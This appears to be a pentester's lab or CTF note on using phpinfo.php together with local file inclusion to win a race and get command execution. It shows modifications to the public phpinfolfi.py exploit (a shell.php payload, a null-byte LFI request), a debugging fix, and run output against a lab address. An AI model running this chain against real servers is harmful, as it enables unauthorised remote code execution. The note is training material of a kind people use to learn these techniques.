5 foothold_2 phpinfo.php + LFI

# phpinfo.php contains file_uploads: ON
# if phpinfo.php + LFI is possible, its possible to creat race condition and have command execution

Using https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/phpinfolfi.py

# modifications (1 more down)
1. in place of paylaod (don't modify the full variable), put entire shell.php
2. LFIREQ="""GET /browse.php?file=%s%%00 HTTP/1.1\r

$ python phpinfolfi.py localhost 80 100
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
  File "phpinfolfi.py", line 371, in <module>
    main()
  File "phpinfolfi.py", line 331, in main
    offset = getOffset(host, port, reqphp)
  File "phpinfolfi.py", line 290, in getOffset
    raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output

# added redirection via burp to debug the error and 
# checking the reponse and saw [tmp_name] =&gt.
# in the script its [tmp_name] =>

3. modify => to =&gt

# worked.
# remove burp proxy


$ python phpinfolfi.py 10.10.10.84 80 200
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 112940
Spawning worker pool (200)...
 1000 /  1000
:(
Shuttin' down...

# should get shell

Last updated